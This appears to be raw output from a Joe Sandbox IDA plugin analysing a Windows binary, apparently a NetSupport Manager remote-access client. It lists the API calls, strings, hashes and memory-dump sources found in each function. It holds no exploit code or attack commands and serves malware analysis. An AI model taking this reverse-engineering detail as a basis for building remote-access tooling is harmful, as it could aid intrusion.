                                                                                                                        • API ID: CriticalSection$Enter__mtinitlocknum$CountInitializeSpin__amsg_exit__malloc_crt_free
                                                                                                                        • String ID: /O
                                                                                                                        • API String ID: 2015852156-273608944
                                                                                                                        • Opcode ID: 7e939fef0b0d3b2ef04e5dba03579c14f6faa72bf40e1fa5fc304d33d7e25391
                                                                                                                        • Instruction ID: 8d0676dc71d818654700b9a33504347ef660f4e19c4c91c056ba393e29e5fec1
                                                                                                                        • Opcode Fuzzy Hash: 7e939fef0b0d3b2ef04e5dba03579c14f6faa72bf40e1fa5fc304d33d7e25391
                                                                                                                        • Instruction Fuzzy Hash: 1A31BE75500601AFC720DFA9E8D1B19BBF4FF09710B5081AAE1859B3A1CF70EA12EF40
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B192B0: GetVersionExW.KERNEL32(00B8BEF0,?), ref: 00B192E0
                                                                                                                          • Part of subcall function 00B192B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 00B1931F
                                                                                                                          • Part of subcall function 00B192B0: _memset.LIBCMT ref: 00B19343
                                                                                                                          • Part of subcall function 00B192B0: _wcsncpy.LIBCMT ref: 00B1941B
                                                                                                                        • GetProcAddress.KERNEL32(?,GetDpiForWindow), ref: 00B1AE46
                                                                                                                        • GetProcAddress.KERNEL32(?,GetDpiForSystem), ref: 00B1AE67
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B1AE7C
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00B1AE87
                                                                                                                        • GetDC.USER32(?), ref: 00B1AE92
                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B1AE9D
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00B1AEA7
                                                                                                                          • Part of subcall function 00B12030: LoadLibraryW.KERNEL32(User32.dll,00000000,00B1AE2C), ref: 00B12038
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProc$CapsDeviceErrorFreeLastLoadOpenReleaseVersion_memset_wcsncpy
                                                                                                                        • String ID: GetDpiForWindow
                                                                                                                        • API String ID: 498693238-4136707520
                                                                                                                        • Opcode ID: a88c2ffb2b14e137a68996bb670187c34aca28bbab67ae97a411f0e445293ce6
                                                                                                                        • Instruction ID: 6c656cd45bb02c431187e687fb9b452be76320f868753476359ec4e87e1423fa
                                                                                                                        • Opcode Fuzzy Hash: a88c2ffb2b14e137a68996bb670187c34aca28bbab67ae97a411f0e445293ce6
                                                                                                                        • Instruction Fuzzy Hash: B921C732901210AFD7228F64EC84BEEBBB8FB45B10F6445A9FC06D7291DB395D41CB91
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(00B8B71C,?,00000000,5E06C67B), ref: 00B0C286
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B8B71C,?,00000000,5E06C67B), ref: 00B0C2D9
                                                                                                                        • DeleteCriticalSection.KERNEL32(?,5E06C67B), ref: 00B0C2E6
                                                                                                                        • DeleteCriticalSection.KERNEL32(00B8B71C,?,5E06C67B), ref: 00B0C305
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Delete$EnterLeave
                                                                                                                        • String ID: ..\CTL32\Refcount.cpp$p < ep
                                                                                                                        • API String ID: 3104255891-1059512116
                                                                                                                        • Opcode ID: c59c71b1aab559f233d721a59e1d5af3cc98ea037ba509878a1449e460eaac34
                                                                                                                        • Instruction ID: 0a004eeaee34824c98720beb506647aeab8e697037465bb8e777e22e04f39782
                                                                                                                        • Opcode Fuzzy Hash: c59c71b1aab559f233d721a59e1d5af3cc98ea037ba509878a1449e460eaac34
                                                                                                                        • Instruction Fuzzy Hash: A721A37A9443049FDB20AFA4DC41F5ABBF8FB84B50F1046AAE815932E1DB745C04CB65
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsicoll
                                                                                                                        • String ID: nsa$nsm$nss$nst
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 00AF8B91
                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00AF8BDB
                                                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00AF8C02
                                                                                                                          • Part of subcall function 00AF3D80: _memset.LIBCMT ref: 00AF3DB2
                                                                                                                          • Part of subcall function 00AF3D80: RegQueryValueExW.ADVAPI32(?,DisplayName,00000000,00000000,?,00000400), ref: 00AF3DD2
                                                                                                                          • Part of subcall function 00AF3D80: __wcsicoll.LIBCMT ref: 00AF3E1C
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AF8C3F
                                                                                                                          • Part of subcall function 00AF6240: _memset.LIBCMT ref: 00AF6276
                                                                                                                          • Part of subcall function 00AF6240: RegQueryValueExW.ADVAPI32(?,InstallLocation,00000000,00000000,?,00000400), ref: 00AF629C
                                                                                                                          • Part of subcall function 00AF6240: RegQueryValueExW.ADVAPI32(?,DisplayIcon,00000000,00000000,?,00000400), ref: 00AF62DA
                                                                                                                          • Part of subcall function 00AF6240: _wcschr.LIBCMT ref: 00AF630A
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AF8C55
                                                                                                                        Strings
                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00AF8B81
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$CloseOpen_memset$Enum__wcsicoll_wcschr
                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutW.USER32(?,0000000D,00000100,?,00000002,00000064,?), ref: 00B25111
                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00B25129
                                                                                                                        • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 00B25145
                                                                                                                        • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,?), ref: 00B2516C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B25173
                                                                                                                        Strings
                                                                                                                        • pid=%d, hwnd=%x, fn=%s, title=%s, xrefs: 00B251BC
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseFullHandleImageMessageNameOpenQuerySendThreadTimeoutWindow
                                                                                                                        • String ID: pid=%d, hwnd=%x, fn=%s, title=%s
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(?), ref: 00B04099
                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00B0410D
                                                                                                                        • SetCursor.USER32(00000000), ref: 00B04114
                                                                                                                          • Part of subcall function 00B03F70: IsWindow.USER32(?), ref: 00B03F7D
                                                                                                                          • Part of subcall function 00B03F70: ShellExecuteW.SHELL32(?,open,?,00000000,00B6A054,00000001), ref: 00B03FC6
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: CursorWindow$ExecuteLoadShell
                                                                                                                        • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                                                                        APIs
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00B310DA
                                                                                                                        • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00B31108
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000004), ref: 00B31127
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Move$Copy
                                                                                                                        • String ID: .new$Copy %s to %s$pcigina
                                                                                                                        APIs
                                                                                                                        • BeginPaint.USER32(?,?), ref: 00B2225C
                                                                                                                        • EndPaint.USER32(?,?), ref: 00B22267
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                          • Part of subcall function 00B3CC21: _doexit.LIBCMT ref: 00B3CC2D
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00B2228E
                                                                                                                        • DefWindowProcW.USER32(?,?,?,?,000000FF), ref: 00B2229B
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Paintwsprintf$BeginFreeGlobalLocalProcTimeWindow_doexit_mallocwvsprintf
                                                                                                                        • String ID: Create main window$Destroy Window
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00AF0E24
                                                                                                                          • Part of subcall function 00B391A1: RaiseException.KERNEL32(00B3367E,00B82978,00000000,?,00B3367E,00B82978,?,00B32ECB,00000000,?,00B3367E,?), ref: 00B391E3
                                                                                                                        • std::exception::exception.LIBCMT ref: 00AF0E48
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00AF0E63
                                                                                                                        • std::exception::exception.LIBCMT ref: 00AF0E82
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00AF0E9D
                                                                                                                        • std::exception::exception.LIBCMT ref: 00AF0EB7
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00AF0ED2
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,00B6F4D8,?,00000010,?), ref: 00B241E4
                                                                                                                        • __wcsicoll.LIBCMT ref: 00B241FA
                                                                                                                        • lstrcmpiW.KERNEL32(00000001,00B7250C), ref: 00B24215
                                                                                                                        • lstrcmpiW.KERNEL32(00000001,Yes), ref: 00B24224
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcmpi$PrivateProfileString__wcsicoll
                                                                                                                        • String ID: True$Yes
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Name::operator+$NameName::
                                                                                                                        • String ID: throw(
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B192B0: GetVersionExW.KERNEL32(00B8BEF0,?), ref: 00B192E0
                                                                                                                          • Part of subcall function 00B192B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 00B1931F
                                                                                                                          • Part of subcall function 00B192B0: _memset.LIBCMT ref: 00B19343
                                                                                                                          • Part of subcall function 00B192B0: _wcsncpy.LIBCMT ref: 00B1941B
                                                                                                                        • LoadLibraryW.KERNEL32(shcore.dll), ref: 00B1D0CF
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 00B1D0F3
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B1D103
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadOpenProcVersion_memset_wcsncpy
                                                                                                                        • String ID: SetProcessDPIAwareness(%d)$SetProcessDpiAwareness$shcore.dll
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00B83318,00000008,00B42B66,00000000,00000000,?,00B097EE,00000000,?,?), ref: 00B42A6F
                                                                                                                        • __lock.LIBCMT ref: 00B42AA3
                                                                                                                          • Part of subcall function 00B492EA: __mtinitlocknum.LIBCMT ref: 00B49300
                                                                                                                          • Part of subcall function 00B492EA: __amsg_exit.LIBCMT ref: 00B4930C
                                                                                                                          • Part of subcall function 00B492EA: EnterCriticalSection.KERNEL32(?,?,?,00B42AA8,0000000D,?,00B097EE,00000000,?,?), ref: 00B49314
                                                                                                                        • InterlockedIncrement.KERNEL32(00B88D80), ref: 00B42AB0
                                                                                                                        • __lock.LIBCMT ref: 00B42AC4
                                                                                                                        • ___addlocaleref.LIBCMT ref: 00B42AE2
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                        • String ID: KERNEL32.DLL
                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 00B44702
                                                                                                                          • Part of subcall function 00B42B8B: __getptd_noexit.LIBCMT ref: 00B42B8E
                                                                                                                          • Part of subcall function 00B42B8B: __amsg_exit.LIBCMT ref: 00B42B9B
                                                                                                                        • __getptd.LIBCMT ref: 00B44713
                                                                                                                        • __getptd.LIBCMT ref: 00B44721
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                        APIs
                                                                                                                        • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 00B14C8B
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00B14CAC
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B14CD8
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00B14CF9
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00B14D01
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 00B14D1B
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharFileMultiWide$CreateModuleNameQueryVirtual__alloca_probe_16
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$FullNamePath__wcsdup
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1390683719-0
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$FreeUnlock$DeleteObject$_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 938152311-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00AEAD70: GetLastError.KERNEL32 ref: 00AEADB9
                                                                                                                        • GetLastError.KERNEL32 ref: 00B2E91B
                                                                                                                        • GetLastError.KERNEL32 ref: 00B2E99D
                                                                                                                        Strings
                                                                                                                        • restart audio ret %d, xrefs: 00B2E95E
                                                                                                                        • Remove audio driver ret %d, e=%d, xrefs: 00B2E923
                                                                                                                        • Attempting to restart audio, xrefs: 00B2E944
                                                                                                                        • Install audio driver ret x%x, e=%d, xrefs: 00B2E9A5
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: Attempting to restart audio$Install audio driver ret x%x, e=%d$Remove audio driver ret %d, e=%d$restart audio ret %d
                                                                                                                        • API String ID: 1452528299-2276465569
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00B094D8
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00B094FA
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00B09516
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00B0951D
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B09524
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$CloseCreateFileFreeHandleLockUnlock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1361453894-0
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00B06E59
                                                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 00B06E77
                                                                                                                        • RealizePalette.GDI32(00000000), ref: 00B06E80
                                                                                                                        • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 00B06E91
                                                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00B06EA1
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B06EAA
                                                                                                                        Similarity
                                                                                                                        • API ID: Palette$Select$BitmapCreateRealizeRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1213237138-0
                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 00B42172
                                                                                                                          • Part of subcall function 00B42B8B: __getptd_noexit.LIBCMT ref: 00B42B8E
                                                                                                                          • Part of subcall function 00B42B8B: __amsg_exit.LIBCMT ref: 00B42B9B
                                                                                                                        • __amsg_exit.LIBCMT ref: 00B42192
                                                                                                                        • __lock.LIBCMT ref: 00B421A2
                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00B421BF
                                                                                                                        • _free.LIBCMT ref: 00B421D2
                                                                                                                        • InterlockedIncrement.KERNEL32(027717F0), ref: 00B421EA
                                                                                                                        Similarity
                                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3470314060-0
                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 00B4310E
                                                                                                                          • Part of subcall function 00B42B8B: __getptd_noexit.LIBCMT ref: 00B42B8E
                                                                                                                          • Part of subcall function 00B42B8B: __amsg_exit.LIBCMT ref: 00B42B9B
                                                                                                                        • __calloc_crt.LIBCMT ref: 00B43119
                                                                                                                          • Part of subcall function 00B45B13: Sleep.KERNEL32(00000000,00000000,?,?), ref: 00B45B3B
                                                                                                                        • __lock.LIBCMT ref: 00B4314F
                                                                                                                        • ___addlocaleref.LIBCMT ref: 00B4315B
                                                                                                                        • __lock.LIBCMT ref: 00B4316F
                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 00B4317F
                                                                                                                          • Part of subcall function 00B3CFC7: __getptd_noexit.LIBCMT ref: 00B3CFC7
                                                                                                                        Similarity
                                                                                                                        • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__getptd
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3803058747-0
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,000000F2), ref: 00B230A4
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectorySystem
                                                                                                                        • String ID: .dll$.org
                                                                                                                        • API String ID: 2188284642-843266101
                                                                                                                        APIs
                                                                                                                        • _wcschr.LIBCMT ref: 00B26C48
                                                                                                                        • _malloc.LIBCMT ref: 00B26C63
                                                                                                                        • _calloc.LIBCMT ref: 00B26CD6
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,?,00000400,00000000,00000000,product.dat,00000000), ref: 00B26D24
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide_calloc_malloc_wcschr
                                                                                                                        • String ID: product.dat
                                                                                                                        • API String ID: 4249565170-2831009483
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h, xrefs: 00B264FC
                                                                                                                        • Restore Reg, %s=%d, xrefs: 00B2663A
                                                                                                                        • IsA(), xrefs: 00B26501
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: _malloc
                                                                                                                        • String ID: IsA()$Restore Reg, %s=%d$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                                                        • API String ID: 1579825452-1127581079
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h, xrefs: 00B264FC
                                                                                                                        • Restore Reg, %s=%d, xrefs: 00B2663A
                                                                                                                        • IsA(), xrefs: 00B26501
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: _malloc
                                                                                                                        • String ID: IsA()$Restore Reg, %s=%d$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                                                        • API String ID: 1579825452-1127581079
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf
                                                                                                                        • String ID: Local\$already created$already opened$name too long
                                                                                                                        • API String ID: 2111968516-487411162
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF301A
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B61549
                                                                                                                          • Part of subcall function 00B61534: __CxxThrowException@8.LIBCMT ref: 00B6155E
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B6156F
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF305A
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B614FC
                                                                                                                          • Part of subcall function 00B614E7: __CxxThrowException@8.LIBCMT ref: 00B61511
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B61522
                                                                                                                        • _memmove.LIBCMT ref: 00AF30C6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                        • API String ID: 1615890066-4289949731
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: DebugOutputString__wcsicollwsprintf
                                                                                                                        • String ID: ICFConfig("%s", %d, "%s")$Undefined product
                                                                                                                        • API String ID: 1423417110-3451686069
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsnicmp
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$IsA()$pszNew!=0$pszOld!=0
                                                                                                                        • API String ID: 1038674560-2511792043
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B0C560: GetComputerNameW.KERNEL32(?,?), ref: 00B0C60E
                                                                                                                          • Part of subcall function 00B02200: __wcsnicmp.LIBCMT ref: 00B022B1
                                                                                                                        • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 00B0C712
                                                                                                                        • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 00B0C74E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Delete$ComputerName__wcsnicmp
                                                                                                                        • String ID: IsA()$\Registry\Machine\$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h
                                                                                                                        • API String ID: 758731895-1104758002
                                                                                                                        • Opcode ID: b58ee55c99a75b67aeb33404bc3adb7418a91e5824676f980e8410af7bd24796
                                                                                                                        • Instruction ID: d1f7c44a70c4525913f0235519077d4b2b3ad37c0e27171141c6c9b741cc01a8
                                                                                                                        • Opcode Fuzzy Hash: b58ee55c99a75b67aeb33404bc3adb7418a91e5824676f980e8410af7bd24796
                                                                                                                        • Instruction Fuzzy Hash: 0331A571D04209ABDB00EB98DC56FEEB7F8EF54704F104299F911B32C1EA756A04CBA1
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(?,0000004A,?,?), ref: 00AFC469
                                                                                                                        • SendMessageW.USER32(00000000,0000004A,?,?), ref: 00AFC4A2
                                                                                                                          • Part of subcall function 00AFC2C0: IsWindow.USER32(?), ref: 00AFC2E5
                                                                                                                          • Part of subcall function 00AFC2C0: GetClassNameW.USER32(?,?,00000040), ref: 00AFC2F9
                                                                                                                          • Part of subcall function 00AFC2C0: __wcsicoll.LIBCMT ref: 00AFC30A
                                                                                                                          • Part of subcall function 00AFC2C0: FindWindowW.USER32(?,00000000), ref: 00AFC340
                                                                                                                          • Part of subcall function 00AFC2C0: Sleep.KERNEL32(?,?,?), ref: 00AFC35C
                                                                                                                          • Part of subcall function 00AFC2C0: FindWindowW.USER32(?,00000000), ref: 00AFC370
                                                                                                                        • PostMessageW.USER32(00000000,0000004A,?,?), ref: 00AFC4BE
                                                                                                                        Strings
                                                                                                                        • ..\CTL32\ipc.cpp, xrefs: 00AFC440
                                                                                                                        • m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData), xrefs: 00AFC445
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageWindow$FindPost$ClassNameSendSleepThread__wcsicoll
                                                                                                                        • String ID: ..\CTL32\ipc.cpp$m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData)
                                                                                                                        • API String ID: 703497514-1411620790
                                                                                                                        • Opcode ID: 465ed0c126b66b3eee8c3aa0281fc8ae5c98cc906c79d0c1981428a7e21e874a
                                                                                                                        • Instruction ID: bd2837d76ee9eec9cf0fe4f3ea2748dedc5f969f3d00a8b95baec6458617afed
                                                                                                                        • Opcode Fuzzy Hash: 465ed0c126b66b3eee8c3aa0281fc8ae5c98cc906c79d0c1981428a7e21e874a
